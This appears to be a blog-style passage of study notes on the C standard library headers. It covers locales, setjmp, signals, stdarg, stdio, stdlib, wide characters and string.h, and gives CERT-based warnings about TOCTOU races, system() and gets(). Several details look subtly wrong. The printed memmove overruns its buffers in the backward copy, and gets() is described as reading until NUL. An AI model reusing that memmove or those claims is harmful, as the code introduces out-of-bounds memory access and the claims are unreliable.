fr_CH.ISO8859-15 eu_ES.ISO8859-15 en_US.US-ASCII af_ZA … They are in the format [language[_territory][.codeset]]. OpenBSD has chosen to support only the “C” (aka “POSIX”) and “UTF-8” codesets, but supports many languages and territories in the other locale categories. Unicode subsumes all those partial character encodings, so BSD just wanted to eliminate a source of complexity. One way to see locales in action is by setting environment variables and using Unix tools. We can change sort order using LC_COLLATE. cat <<EOF >cn.txt 我 喜 歡 整 理 單 詞 EOF LC_COLLATE=C sort <cn.txt LC_COLLATE=zh_CN.UTF-8 sort <cn.txt 理 喜 我 單 詞 我 歡 整 整 歡 喜 理 單 詞 Setlocale() doesn’t play well with threads because it updates an internal global variable. Set the locale before spawning threads. One other random nugget of wisdom from the book, unrelated to locales but mentioned in that chapter, is to use a tool to visualize the call tree in a C program. This can help you understand a new codebase. Try cflow. See also Steve Summit’s C FAQ question 18.1. setjmp.h The setjmp/longjump functions create a “saveable goto” statement to return to places you’ve already been. It allows jumping from one function into another. They are like the C programmer’s version of exception handling. Setjmp and longjmp are very tricky inside, as they have to save and restore variables, arguments, registers etc to resume execution in another location. #include <setjmp.h> #include <stdio.h> void dostuff(void); jmp_buf target; int main(void) { if (setjmp(target) == 0) { puts("Saved the target, continuing on."); dostuff(); } else puts("I feel like I've been here before..."); return 0; } void dostuff(void) { longjmp(target, 42); } To indicate that the jmp_buf was set, setjmp returns 0. When execution is jumped back to this point, setjmp returns value passed as the second argument to longjmp, for us 42. The same if statement is evaluated again but with a different result, like waking up in an alternate universe. As simple as this looks, it’s easy to break. The statement containing setjmp must be very simple. Calling setjmp in an if statement or switch statement are fine, but you should not save the return value like n = setjmp(...). An assignment statement is too complicated and can disturb the sensitive machinery. The function containing setjmp should be as simple as possible. Only variables declared as volatile are guaranteed to be restored. Generally it’s best to execute the real processing in another function called when setjmp returns 0. Longjmp should not be called from an exit handler (i.e., a function registered with the atexit function). Finally it’s undefined behavior to attempt to longjmp to a function that has since returned. Thus longjmp’s usual use case is like exceptions in other languages, going back up the call chain, skipping intermediate functions. The jmp_buf type is actually an array behind a typedef, which is why it’s typically passed to setjmp without an ampersand. The standard forbids jmp_buf to be implemented as a scalar or struct. Given all these caveats, the committee considered requiring that compilers recognize calling setjmp as a special case. Then the function could work in all types of statements. However they decided against it for consistency because they don’t require any other function to be a special case (although they allow compiler writers to make special cases as desired). signal.h Signals are a UNIX technique for interprocess communication that causes a process to asynchronously call a handler function, or else take a default action. Programs also receive “synchronous” signals for their own logical exceptions like division by zero, segmentation faults, or floating point problems. The ANSI committee decided to standardize a weakened portable version of signal functionality. Portable signal handlers can do very little. Here’s a typical example of what a handler can do safely: /* a global */ volatile sig_atomic_t intflag = 0; /* SIGINT handler */ void field_int(int sig) { signal(SIGINT, &field_int); intflag = 1; return; } It does as little as possible, simply setting a global variable which regular code can check at leisure. One thing to note is that it re-installs itself in the very first line with the signal() function. That’s because on some platforms (like Linux), as soon as a signal is handled it reverts to its default handler, which in the case of SIGINT terminates the program. Other systems such as BSD leave a handler installed when called. On Linux this would be an unwise thing to do: void field_int_badly(int sig) { /* open a window where a repeat signal could * hit the default handler before we reinstall */ sleep(1); signal(SIGINT, &int_catch); intflag = 1; return; } Even our earlier technique of calling signal() right away in the handler isn’t completely safe. The CERT C Coding Standard warns that this leaves a tiny window open for a race condition. They suggest not to use the C library signal functionality at all, but the equivalent POSIX functions instead. POSIX allows you to specify persistence of the handler during initial registration. Another thing to note is the type declaration of the shared flag (that we called intflag in the example). Exception handlers should read and write only volatile variables. For asynchronous exceptions, volatile alone isn’t even enough. The variable should be small enough that it can be read or written atomically by the processor. The C standard provides the sig_atomic_t typedef for this. Each standard library implementation defines it as an alias for a suitably small integral underlying type. If you’re writing portable code, don’t assume that sig_atomic_t is anything bigger than a char, and don’t assume its signedness. Thus the portable value range is 0…127, although C99 added macros to determine its min and max values. The standard says not to call any standard library functions from a signal handler except abort(), exit(), longjmp() or signal(). Certainly avoid any functions that interact with state, like those performing I/O or else stdio streams can become corrupted. Even though the C standard says it’s OK to call longjmp from a signal handler, CERT gave an example where doing so caused a vulnerability [VU #834865] in Sendmail because it allowed attackers to time a race condition in main() by timing signals. A program can raise signals for itself with the raise() function. (It used to be called kill.) However longjmp() is less tricky than raising signals for yourself and should be preferred. The standard library defines this limited list of signals: SIGABRT abnormal termination, such as is initiated by the abort function SIGPPE an erroneous arithmetic operation, such as zero divide or an operation resulting in overflow SIGILL detection of an invalid function image, such as an illegal instruction SIGINT receipt of an interactive attention signal SIGSEGV an invalid access to storage SIGTERM a termination request sent to the program Using other signals makes a program less portable. stdarg.h On the PDP-11 it was easy to walk function arguments with a pointer. The memory layout of arguments was well known, the size of pointers was the same as the size of int, and the original C language could not pass structures by value. However when spreading to other architectures, C benefited from creating a portable way to access variable numbers of arguments. Non-PDP architectures had complex calling conventions. Using a library for variadic arguments makes code clearer too, whether or not portability is an issue. Pre-ANSI C on UNIX used <varargs.h>, which required a final “dummy argument.” ANSI C got more picky about arguments matching a declaration, and introduced the “…” token to take the place of the dummy argument, which breaks varargs. The “…” also signals to a compiler that it may want to change the function calling convention. The committee turned varargs.h into stdarg.h, and generalized the macros to the extent that all known C implementations would be able to handle them with little modification. This functionality was important for other functions in the standard library like printf and scanf. Using the library is pretty easy, just initialize the list based on the final fixed argument, loop through the args, and release the list. /* add a list of n numbers */ int sum(int n, ...) { va_list ap; int s; va_start(ap, n); for (s = 0; n > 0; --n) s += va_arg(ap, int); va_end(ap); return s; } It is undefined behavior to call va_arg() more times than there are arguments, so the function will need to determine the number of arguments by other means. Our function above consults the n parameter for that information. Speaking of the n variable, we’re not actually passing its value to va_start(), much as it may look. The va_start macro manipulates “n” as merely a name, so it can calculate the address of the next argument. Both va_start and va_arg must be implemented as macros, not as functions. These are the portable assumptions for using stdarg.h: The variadic function must declare at least one fixed argument The function must call va_end before returning (for cleanup on some architectures) va_arg can deal only with those types that become pointers by appending “*” to them. Thus register variables, functions, and arrays can’t be returned by va_arg If a type widens with default argument promotions, then va_arg should request the widened type The last point requires some explanation. When functions had no prototypes in pre-ANSI C, the compiler would promote smaller types to wider ones when sending them to functions. That’s because doing so is essentially free – it costs more to put a byte in a register than to put a word in. Although ANSI requires functions to have prototypes, the promotion rule still applies to variadic arguments. Char and short get expanded to int, and float gets promoted to double. Thus to accept a char argument, ask for its value with va_arg(ap, int) and then cast to char. Don’t do va_arg(ap, char). To pass a va_list to another function for continued processing either a) memcpy it if you want to consume all arguments in the current function or b) pass a pointer to it if the called function should consume some or all of the arguments. C99 added va_copy() for the first scenario. The implementation of stdarg.h macros is gnarly and entirely platform specific. On my system they resolve to builtin compiler functions. stddef.h Stddef.h is a catchall place for definitions, sort of like stdlib.h. Why make two headers rather than combine them into one? It’s because C can be compiled in either a “hosted” or a “freestanding” environment. The latter is for embedded programming where there isn’t enough room for the entire standard library. An implementation must include all the standard library headers to be considered a hosted environment, while a freestanding environment must include only float.h, limits.h, stdarg.h, and stddef.h. The committee deliberated about putting the things in stddef into the C language itself, but decided the need to extend C is not quite there. Stddef provides ptrdiff_t, size_t, wchar_t, NULL, and offsetof(structname, attrib). Only ptrdiff_t and offsetof are unique to this header. Other headers usually contain duplicates of the other definitions. I used to think that NULL was a reserved word in C, but have come to learn that the constant 0 is actually the crux. The compiler treats 0 specially in a pointer context and transforms it to whatever value represents the NULL pointer on the given architecture (which needn’t be bitwise zero). Thus NULL is typically a macro for ((void *)0). As such it can’t be assigned to a function pointer because data pointers needn’t be the same size as function pointers. Some compilers allow you to do it, but don’t count on it. The reliable method is to cast zero as needed, e.g. (int (*)(void))0. The typedef size_t is an unsigned integral type big enough to hold the size of the largest possible object in memory. In some systems that might not be very large, for instance only 64k in the segmented memory model on the Intel 80286. Related rule of thumb: if a variable is going to index an array, it should be type size_t. The typedef ptrdiff_t is a signed integral type of the result of a pointer subtraction. It’s signed because if (p - q) is positive then (q - p) will be negative. Note that if size_t is already the largest integer type, then ptrdiff_t can be no larger, yet the latter loses one bit to hold the sign. So it’s possible to make an array with cells too far apart for ptrdiff_t to measure. (Assuming there is room in memory for such a large single array.) C99 provides a macro SIZE_MAX with the maximum value possible in size_t. C89 doesn’t have it, although you can obtain the value by casting (size_t)-1. This assumes a twos’ complement architecture, which is the most common number representation on modern computers. You can enforce the requirement like this: #include <limits.h> #if ULONG_MAX != -1UL #error "This code requires 2s' complement arithmetic" #endif The offsetof() macro can determine the offset in bytes of a member within its structure. This cannot easily be determined otherwise due to structure padding. The C99 rationale talks about using it to provide “generic” routines that work from descriptions of the structures, rather than from the structure declarations themselves. On many platforms it is defined as: #define offsetof(type, field) ((size_t)(&((type *)0)->field)) That’s undefined behavior, but that’s what the standard library is for: a portable way to do sometimes non-portable operations. stdio.h UNIX I/O was clean and simple compared with other systems of its day. It was 8-bit clean, and used a consistent line terminator. At the edges ioctl() would translate the simple I/O streams for the idiosyncrasies of attached devices. The kernel would hold file control state internally and give programs a simple integer descriptor for to use when reading and writing. Leaving UNIX, C ran up against the complexity of I/O on other systems. The X3J11 committee talked with vendors and came away with a sharper understanding of the I/O model they wanted to support. They had to distinguish text and binary modes. DOS used \n\r for line endings. The \r had to be stripped in text mode but not binary mode. UNIX ignores binary mode, but you better enable it for portability when necessary. UNIX also had an unusually faithful representation of files. You could put bytes in and expect to read them out unchanged. When doing fully portable I/O keep these caveats in mind: A final line without a terminating newline (in text mode) can confuse some systems, and they may drop the line or append a newline. Don’t count on the system preserving trailing space in a line. Some systems strip it out. Conversely, some systems add a space to a blank line so the line “has something in it.” The maximum fully portable line length is 254 characters. Implementations are free to pad the end of binary files with a block of NUL characters to make the files match certain disk block sizes. Another difference between the C standard I/O and UNIX is buffering. In UNIX, people often wrote their own buffering code to reduce the number of relatively costly I/O system calls. The X3J11 committee decided to include this buffering functionality in stdio. Buffering is an optimization that can be tailored to expected patterns of I/O. The standard library provides the setvbuf() function to change the size and location of a stream’s buffer, as well as choosing between line or block buffering. By default, stdin and stdout are line and block buffered respectively, and stderr is unbuffered. Setvbuf() must be called immediately after a stream is opened, before I/O happens, to have any chance of working. (stdio.h) opening and closing Perhaps surprisingly, there is a lot to learn about just opening files. First there may be a limit on how long a filename can be on a system. Stdio provides the FILENAME_MAX macro with this limit. If the system imposes no practical limit then the macro is just a suggested size. This value could be both too short, or paradoxically too long. If it is set very large then you might end up wasting memory or causing problems if allocating on the stack. Similarly L_tmpnam is the size needed for an array large enough to hold a temporary filename generated by tmpnam(). This function is a security hazard (though it can be useful for generating entropy). It introduces a Time of Check, Time of Use (TOCTOU) race condition because another program or thread could obtain the same temporary file name and create the file first. Use the tmpfile() function instead which actually creates the file, and registers it for removal on normal program exit(). Another common TOCTOU happens with fopen() when trying to create but not replace a file. Programs first check existence, right after which an evildoer can create a symlink of the same name in time for the fopen with “w” mode to overwrite another file with possibly elevated permissions. /* dangerous */ FILE *fp = fopen("foo.txt","r"); /* <-- attacker gets busy here */ if (!fp) { fp = fopen("foo.txt","w"); ... fclose(fp); } else fclose(fp); C99 fixes this with an “x” (exclusive) mode modifier. If exclusive mode is specified (“wx”), the fopen fails if the file already exists or cannot be created. In C89 you can either go beyond the standard library, using the POSIX open() function with the O_CREAT | O_EXCL flags, or just try to keep the time between check and write as small as possible. Once you have opened a file to your liking, or have been given a FILE pointer, treat the pointer as totally opaque. Don’t even try to make a copy of the FILE structure because some implementations rely on magic memory addresses for some of them. The CERT standard (FIO38-C) says that the following can cause a crash on some platforms if you try to use my_stdout: /* don't do this */ FILE my_stdout = *stdout; There’s a related function called freopen(), but it’s not used very often. The main use is converting a big program from reading stdin to reading a named file. It’s the simplest way to do that, whereas a new program should just directly fopen whatever file it wants. During a normal program exit, all open files will be closed. Still, it’s useful to explicitly call fclose() on file handles. It helps avoid exceeding the FOPEN_MAX limit of files that can be open at once. Also, failing to properly close files may allow an attacker to exhaust system resources and can increase the risk that file buffers will not be flushed in the event of abnormal program termination. Speaking of flushing buffers, fflush() might force items in the buffer to be processed, but there is no guarantee. For convenience, fflush(NULL) flushes all streams, which is useful in preparation for possible loss of program control, like going into a dangerous section, or telling the user to turn off the computer. Two other quirks. Some operating systems will not actually create a file that you fopen() and fclose() unless you write something. Also you can close stdout or stderr, and there are sometimes reasons to do so! (stdio.h) file navigation Stdio.h has two similar pairs of functions to move around in a file: fgetpos/fsetpos and ftell/fseek. Why the duplication? The second pair represents position as a long integer. When the file is opened in binary mode, this long is the number of bytes from the start of file. This is useful because you can do arithmetic on the integer to jump to particular places. The drawback is that on some systems a long is only 32 bits, so cannot support large files. The fgetpos/fsetpos pair works using a special structure that can represent positions in huge files. You must treat treat this structure as a magic bookmark. It’s only obtainable from a call to fgetpos, you cannot construct your own to point to a position you haven’t already been. Stdio also includes a rewind() function, but don’t use it. It actively clears the error indicator for a stream. Instead do a fseek(stream, 0L, SEEK_SET). These navigation commands were interesting to me, so I created a project called randln to experiment with different ways of picking a random line from a text file. You might find it interesting to look at the pros and cons of each method as explained in the readme. You can actually inspect I/O as it happens. The trick is walk the program through a debugger while tracing its system calls in another terminal. To use that randln program as an example, First start it in the debugger. Enable tracing for the debugger’s I/O and that of its children. ktrace -i -ti gdb randln Put a breakpoint in the line-finding function and start the program. In another terminal find the PID of randln that was launched by gdb, and start tailing the ktrace dump. This command will show the first 20 bytes of data in each I/O request: kdump -m 20 -l -p <pid> Now step through the program in the debugger and watch the consequences of each statement. A final note about stream navigation and the shell. I noticed when doing foo <barthe program can perform fseeks on bar, but cat bar | foo cannot. It’s another reason not to abuse cat. (stdio.h) reading and writing The foundation of all stream input is fgetc(). The other standard library input functions must be implemented as if they call it repeatedly, even if they don’t. It pulls a character out of a stream (or a character that was pushed back by ungetc() if such exists), and refills the stream buffer if needed. Some platforms allow ungetc() to push back a whole stack of characters, but the portable assumption is that it can store only one. While fgetc is a function, getc() is a macro that avoids incurring a function call just to get a character. The downside is that getc() is allowed to evaluate its argument more than once, so don’t do anything with a side effect there. Now, fgetc() is allowed to be a macro too, but may not be as efficient because it has less freedom in its implementation. It is not permitted to evaluate its argument twice. Moving up the food chain we come to gets(), which reads characters into a string until it encounters the NUL character – and it’s a buffer overflow waiting to happen. It was removed in C11. The fgets() function is better because you can specify a max length. However if it fails, the contents of the array being written is indeterminate. It is necessary to reset the string to a known value to avoid errors on subsequent string manipulation functions. The fread/fwrite functions work in chunks. My only notes about them are /* prefer this */ fread(buf, 1, size*n, stream) /* over this */ fread(buf, size, n, stream) The second form is worse because you can’t detect whether it read an extra size-1 characters past what it reports. Also some implementations of fread (fwrite) simply call fgetc (fputc) in a loop, whereas others are more optimized. Doing a straight UNIX read (write) can be faster. The standard library doesn’t allow alternating reads and writes without intervening operations to flush or explicitly position the stream: after writing, call fseek(), fsetpos(), rewind(), or fflush() before reading after reading, call fseek(), fsetpos(), or rewind() before writing unless the file is at EOF: a read that hits EOF can be followed immediately by a write The last thing I wanted to mention about reading and writing is a freak consequence of weird machines. On some digital signal processors (or more generally on the DeathStation 9000), both char and int are 32 bits. This causes a vulnerability in the common pattern: int c; while ((c = getchar()) != EOF) ...; There is no extra room in the int type to hold EOF as distinct from a valid character code, so a valid character can make the loop stop early. It’s a high severity bug, a variation of which caused a nasty vulnerability in the bash shell, CA-1996-22. Fine, you say, you don’t plan to target such machines! #include <limits.h> #if UCHAR_MAX == UINT_MAX #error "Your machine is weird." #endif Also you’ll be careful not to indicate a parse failure with an unsigned code that casts to a signed value of EOF. Well the same logic can still trick you in C99 with wide characters if you’re not careful. It works like this: the fgetwc(), getwc(), and getwchar() functions return a value of type wint_t. This value can represent the next wide character read, or it can represent WEOF, which indicates end-of-file for wide character streams. On most implementations, the wchar_t type has the same width as wint_t, and these functions can return a character indistinguishable from WEOF. For this situation be sure to check after the loop for feof() and ferror(). If neither happened then you’ve received a wide character that resembles WFEOF. It’s yet another place where wide character implementations are half baked. (stdio.h) formatting Scanf and printf have formatting options I hadn’t seen before. First of all they can limit the length of strings they read or write. /* limit to 10 characters */ printf("%.10s", big_string); /* or limit to n characters */ printf("%.*s", n, big_string); /* limit to 10 characters */ scanf("%10s", input); I used to think scanf was very unsafe, but this limiting helps. Scanf also supports “scansets” to match strings containing specific characters. Here is how to match up to ten vowels: %10[aeiou]. Scanf also allows you to match but not capture, using *. E.g. %*d. The %n option saves the number of characters read so far in the scan. Finally, in C99 printf has modifiers for size_t (%zu) and ptrdiff_t (%td). Because they are typedefs which change by architecture there is otherwise no way to specify them portably. stdlib.h Stdlib is a hodgepodge. It has six categories of functions inside: algorithms (search, sort, rand) integer functions number parsing multibyte conversions storage allocation environmental interactions (stdlib.h) random numbers Let’s start with an interesting topic: random numbers. The standard library provides a rand() function to generate a pseudorandom sequence starting from a seed specified by srand(). The numbers range from 0 to RAND_MAX. The first problem is that RAND_MAX can be very small (~ 65535) on some platforms. Second problem is that the quality of rand() is not generally very good on most platforms. On Mac OS it is horrible. Changing the random seed by only a small amount (such as seeding by the epoch), leads to similar initial random values. seed 1st rand 1500000000 1189467867 1500000001 1189484674 1500000002 1189501481 1500000003 1189518288 1500000004 1189535095 1500000005 1189551902 1500000006 1189568709 1500000007 1189585516 1500000008 1189602323 1500000009 1189619130 Rather than rely on whatever implementation of rand you get on a given architecture, it’s just as easy to define your own xorshift rand function. The one below is due to Chris Wellons who arrived at the constants through an exhaustive search. static unsigned long g_rand_state = 0; /* assumes 64-bit longs */ unsigned long defensive_rand() { g_rand_state ^= g_rand_state >> 30; g_rand_state *= 0xbf58476d1ce4e5b9UL; g_rand_state ^= g_rand_state >> 27; g_rand_state *= 0x94d049bb133111ebUL; g_rand_state ^= g_rand_state >> 31; return g_rand_state; } One problem is that these 64-bit constants limit portability. You can portably assume that longs are 32-bits. (C99 gives us long long for that.) Chris provides 32-bit rand functions to choose from as well. Luckily the compiler should fail with an error like “integer literal is too large to be represented in any integer type” rather than accepting the program and creating bugs. Now we have a good rand() function, but how should we seed g_rand_state with an initial value? The typical way is to gather the epoch from time(NULL), but it will mean the application will use the same seed if run more than once per second. There are two other sources of entropy available from the standard library. One is hashing the path generated by tmpnam(), which in many implementations consults the process ID or a higher precision clock. The second is hashing the address of the main function, which is often fairly unpredictable due to address space layout randomization (ASLR). Using the address of main numerically is a little tricky. C99 has a type called intptr_t which can hold pointer values as an integer, but this type is for data pointers only, not function pointers which on some architectures have a different size. We might consider casting a pointer to main as (char *) and reading the bytes, but for the same size reason this isn’t feasible. What we can do is create a function pointer to main, point another pointer at it and read the value out byte by byte. A pointer-to-function-pointer is just a data pointer and can be cast to (void *). int (*p)(int, char**) = &main; unsigned char bytes[sizeof(p) + 1] = { 0 }; memcpy(bytes, (void*)&p, sizeof(p)); The bytes array is a NUL terminated string and can be hashed. To see these techniques in action and how to combine the entropy, check out rand.c. If you’re willing to use functions beyond the C standard library, POSIX provides a random() function that is higher quality, and OpenBSD provides arc4random() which returns crypto-grade randomness. (stdlib.h) integer functions In C89 the rounding of integer division isn’t fully specified. When one of the numerator or denominator are negative it may either round toward zero or downward. It matches whatever the underlying hardware does. The committee didn’t want to introduce overhead on any system going against the hardware convention. In C99 they changed their mind, reasoning that Fortan (known for numerical programming) defines the rounding. C99 rounds toward zero. To match this behavior in C89, use the div and ldiv functions. They return structures div_t and ldiv_t that contain both the quotient and remainder of the division. The only reason to use these functions in C99 is for efficiency, because the functions may be implemented with a compiler builtin that can compute the quotient and remainder together in a single assembly instruction. A note about the ato{i,l,f} functions – their behavior is undefined if the input cannot be parsed correctly. These functions need not set errno even. Except for behavior on error, atoi is equivalent to (int)strtol(nptr, (char **)NULL, 10). The strto{d,l,ul} functions should always be preferred, because they provide proper error reporting and choice of base. The implementation of strtod in Plauger’s book was very careful about floating point overflow. It processed digits in groups of eight and then combined them later into a final result. It also consulted the decimal_point attribute set by the LC_MONETARY part of the current locale. (stdlib.h.) memory An interesting bit of history: malloc used to be considered a low-level UNIX function, while calloc (“C alloc”) was conceived as the portable C version. However the committee standardized malloc too because it has less overhead (doesn’t zero the memory). Nowadays it seems malloc is more popular. There also used to be a cfree, but it was identical to free and didn’t make the cut for ANSI C. The most flexible allocation function is realloc because it can simulate both malloc and free. When passed NULL for the original pointer it behaves like malloc, and when passed 0 for requested size it acts like free. (stdlib.h) termination and execution Stdlib contains the EXIT_FAILURE and EXIT_SUCCESS macros with implementation defined integer values to indicate success or failure on exit. These values would be returned by main or passed to exit(). The C standard actually treats return 0 in main or exit(0) specially, and maps it to whatever the system specific success code is. (Similar to how 0 in a pointer context is treated specially as the NULL value the way we talked about earlier.) Thus you don’t need to include stdlib.h just to return successfully. EXIT_FAILURE is necessary for portably indicating failure, though. The raw value 1 is considered successful on some platforms. Speaking of exit(), it causes “normal” termination. It closes all open file handles, deletes files created by tmpfile(), and calls any handlers registered by atexit() in reverse order of their registration. The abort() function, on the other hand, causes immediate and “abnormal” termination. It needn’t flush buffers, remove temp files, or close open streams. It can be canceled by catching SIGABRT. Aborting can be useful because it will cause a core dump if the OS is configured to save one. Thus the assert() function calls abort() to produce a core file to debug assertion failure. Stdlib.h provides the system() function to run a command in the shell. If the command is a NULL pointer, system() will return non-zero if the command interpreter is available, and zero if it is not. The CERT standard says system() is a security violation and flat out says not to call it. It’s easy to make a mistake with system(). Commands that are not fully pathed can be overridden, and even relative paths can be tricky if the attacker can control the current directory. And of course unsanitized input can attack through the shell. CERT suggests using execve() in POSIX to call fully pathed executables. (stdlib.h) wchar_t OK, this is going to get complicated. The takeaway is that the C standard library cannot portably handle Unicode. You’ll need a good third-party library. Let’s see why this is. Before locales and all that, C was designed for 7-bit ASCII text. The committee endorsed the use of locales to specify a codepage that reassigned the meaning of extra characters using all eight bits (the minimum allowed size of char). However some languages use more than 255 symbols (+ NUL). There were two ways to handle bigger alphabets: use bigger chunks of memory to hold each character code, or define special sequences of single byte characters to stand for extended characters. These approaches are called “wide characters” and “multibyte characters.” Generally because networking equipment and disk storage is byte oriented, programs use multi-byte character encoding for communication with the outside world and storage. However for in-memory use people felt that using wide characters would be cleaner, because each cell in an array would map to exactly one character, like in the old ASCII string days. The C89 standard is not very helpful with multibyte or wide character encoding. It merely set the stage with a wchar_t type for wide characters, and functions in stdlib.h to convert multibyte to wchar_t (mbstowcs) and the reverse (wcstombs) based on the locale. The committee was waiting to see how people wanted to work with international characters before standardizing it. K&R 2nd edition does not list these functions but Plauger and the C89 spec have them. The whole idea was that locale-specific multibyte to wide character conversion was supposed to be more general than any particular encoding system. However, nowadays Unicode has proven to be more popular than other encodings. The multibyte UTF-8 encoding is the standard interchange on the web, and the UCS-4 character set is up to the task of handling all the world’s languages and then some. Should be no problem, right? Well, at the time C99 was being standardized, the Unicode consortium (actually the contemporaneous European ISO committee) was endorsing the more limited Universal Coded Character Set UCS-2. The codepoints for UCS-2 are 16 bits, so that’s the minimum width that C99 requires for wchar_t. Sadly the committee made their decision shortly before four byte UCS-4 was proposed (ISO 10646). Vendors like Microsoft jumped into Unicode right away and implemented wchar_t as 16 bits. It’s deep in their APIs and they’re now stuck with that size for backward compatibility. Even Mac OS and iOS use 16 bit wchar_t for whatever reason. UTF-16 combines the worst of multibyte characters and wide characters. a) Characters outside the “base multilingual plane” require two UTF-16 codepoints (called a surrogate pair) to represent them. This breaks the one-character-one-codepoint assumption. b) It’s wasteful of memory because even ASCII characters take two bytes. C99 provides wide character versions of the ctype functions, in <wctype.h>, but they simply cannot work properly with surrogate pairs. For example (as pointed out here😞 0xD800 0xDF1E = U+1031E is a letter (iswalpha should be true) 0xD800 0xDF20 = U+10320 is not a letter (iswalpha should be false) 0xD834 0xDF1E = U+1D31E is not a letter (iswalpha should be false) 0xD834 0xDF20 = U+1D320 is not a letter (iswalpha should be false) 0xD835 0xDF1E = U+1D71E is a letter (iswalpha should be true) 0xD835 0xDF20 = U+1D720 is a letter (iswalpha should be true) Neither the first nor the second element of the pair alone can predict whether the resulting Unicode character is alphabetic. There is no way that a system can provide this information through a function ‘iswalpha’ that takes a single wchar_t argument. C99 does guarantee a macro will be present when the current environment is ISO 10646 compliant, meaning wchar_t can hold every UCS-4 codepoint. We can blow up for the other platforms: #ifndef __STDC_ISO_10646__ #error "Your wide characters suck." #endif Even assuming we restrict the code to ISO 10646 systems only, the wctype functions are too crude to deal with the subtleties of international languages. Because of how Unicode characters can join together, it’s infeasible to use pointer arithmetic to calculate “string length” or parse “words” with iswspace() robustly. Some parts of programs can continue to operate on text as an opaque series of bytes. However for other parts that must inspect the characters themselves, you should use a sophisticated Unicode library like ICU or utf8proc. This has the advantage of working with C89, so you won’t be forced to upgrade to C99 just because of text processing. With a good Unicode library we don’t need wide characters. We can use UTF-8 everywhere, even in program memory. That’s the school of thought behind utf8everywhere.org. (stdlib.h) lessons from the code While reading Plauger’s implementation for stdlib, I noticed some tricks worth sharing. The comma operator can be used to group multiple small assignments together under an if statement without needing to add curly braces. if (condition) foo = 1, bar = 2; Also an if statement with no statements can be used to shrink a big expression in another if statement: if (cond) ; else if (big cond) foo; C89 allows bare blocks inside a function to segregate variable declarations near the code that uses them. The variables are not accessible outside the block. It can help readability to know when variables are no longer needed, although you might argue that it suggests the function as a whole is too big. #include <stdio.h> int main(void) { puts("Hello."); { int i = 0; printf("%d\n", i); } /* error: use of undeclared identifier 'i' */ printf("%d\n", i); } Speaking of brackets, Plauger uses Whitesmiths style indentation, with brackets indented to the level of their code: if (cond) { foo(); while (cond) { bar(); baz(); } } I find it difficult to read (probably just unfamiliar), but it does have an internal consistency. The brackets are wrapping up multiple statements into a single unit, and this unit is indented the same way that a single statement would be. Still not going to indent this way, but just saying. Another interesting trick is negating an unsigned number. Plauger does that to consolidate code for signed and unsigned numbers in the same function. unsigned long _Stoul(const char *, char **, int); #define atoi(s) (int)_Stoul(s, NULL, 10); #define atol(s) (long)_Stoul(s, NULL, 10); #define strtoul(s, endptr, base) _Stoul(s, endptr, base); This _Stoul() function negates its unsigned long value if the string it is parsing has a negative sign. This operates bitwise on an unsigned value the same as it would on signed, and after casting for atoi and atol it will be negative as expected. I didn’t know it was “allowed,” but C doesn’t care. string.h This header is divided between functions starting with str- and those starting with mem-. The former work with NUL terminated strings, and the latter operate with explicit lengths. Some of the str- functions have a modifier to limit length (strncat, strncmp, strncpy) or a modifier to work backward (strrchr). However the header doesn’t have all permutations. For instance no strnlen or memrchr. Why does strchr take an int rather than a char for its search character? Same with memset, it takes an int value, but converts it to unsigned char internally. The spec dictates this in section 7.21.6.1. That misleading int signature is for backward compatibility with pre-ANSI code which lacked function prototypes and promoted char arguments to int. Under default argument promotions any integral type smaller than int (or unsigned int) always converts to int. All standard library functions are specified in terms of the “widened” types. It’s just that string.h contains many functions where it is especially apparent. The widened types ensure that most library functions can be called with or without a prototype in scope. Legacy code doesn’t use prototypes, and ANSI C did not want to break backward compatibility. Even if people were willing to update all the legacy code, any legacy modules distributed as compiled object files rather than source would not link properly against functions with changed argument types. Similar rationale lies behind the standard’s guarantee that char pointers and void pointers share the same representation and alignment requirements. Relying on this guarantee allows old code that to work with the void* malloc in place of the original char* malloc. (See the C99 Rationale section 7.1.4, Use of Library Functions.) We’re not done with the type mysteries in string.h. Why is it that strchr casts its int argument to char internally and memchr casts to unsigned int? Well given that strchr is searching through char*, it makes sense to match the type. But memchr is searching through void*. Why not compare each memory location with char rather than unsigned char? It turns out that the C standard makes special guarantees about unsigned char that make it an ideal type to represent arbitrary binary information. Unsigned char is guaranteed to have no padding bits. All bits contribute to the value of the data. Other types on some architectures include things like parity bits which don’t affect the value itself but do use space. No bitwise operation starting from an unsigned char value, when converted back into that type, can produce overflow, trap representations or undefined behavior. It can be freely manipulated. Trap representations are certain bit patterns that are reserved for exceptional circumstances, like the NaN value in floating point numbers. Accessing parts of a larger data object ith an unsigned char pointer will not violate any “aliasing rules.” The unsigned char pointer will be guaranteed to see all modifications of the data object. In “Portable C,” Rabinowitz says the char type has a few distinct uses: codeset characters, units of storage, small numbers, and small bit patterns. He recommends regular char for codepoints and small numbers, and unsigned for the others. (In C99 wchar_t might be considered the proper way to represent codeset characters, but we’ve already seen the difficulty there.) Note that Rabinowitz doesn’t specify signed char and unsigned char, but rather plain char and unsigned char. That’s because C does not specify whether plain char is signed or unsigned. We would get a warning trying to pass a definitively signed char* to a function in string.h if the default was unsigned char for that platform. The next functions that taught me something are memcpy and memmove. The first one blasts bytes from one part of memory to another, possibly taking advantage of machine instructions to do large block copies. It doesn’t check for an overlap between the source and destination, in which situation the results are undefined. C99 marks the source and destination pointers with the restrict qualifier to allow the compiler to optimize under that assumption. Memmove is the slower more careful brother. It works correctly even if the source and destination areas overlap. It is specified to act as if the source memory is first copied to a separate buffer, then copied into the destination. When I tried writing it that is exactly what I did, but Plauger has a faster way: void *(memmove)(void *d, const void *s, size_t n) { unsigned char *ds = d; const unsigned char *ss = s; if (s > d) while (n-- > 0) *ds++ = *ss++; else for (ss += n, ds += n; 0 < n; --n) *ds-- = *ss--; return d; } This compares the pointer positions to see which occurs before the other in memory, then does the copy from left to right or right to left depending on which comes before the other. This is very fast and uses no extra space. However, isn’t comparing random pointers undefined behavior? C allows you to compare pointers within the same primary data object (like the addresses of different cells in the same array), but not any random pointers. Objects could be in different segments of a segmented memory architecture, or even in totally different memory banks such as in a Harvard architecture. But with memmove why would you call it when copying one data object into a totally different one? There would be no danger that they overlap, unless you are copying too many bytes, which is already its own big problem. Thus we can assume that the pointers to memmove are in the same data object and thus comparable. What this also tells me is not to indiscriminately use memmove all the time in order to be “safe” or something, because some implementations like Plauger’s would then cause undefined behavior. One other thing to note about the memmove implementation is that it uses unsigned char pointers to do the work rather than void pointers. Doing pointer arithmetic on void* is a GNU-ism not permitted in portable C. One nice property of returning the destination address from the string.h functions is that they can chain together: if (strcmp(strncat(strcpy(s, "abcde"), "fg", 1), "abcdef")) 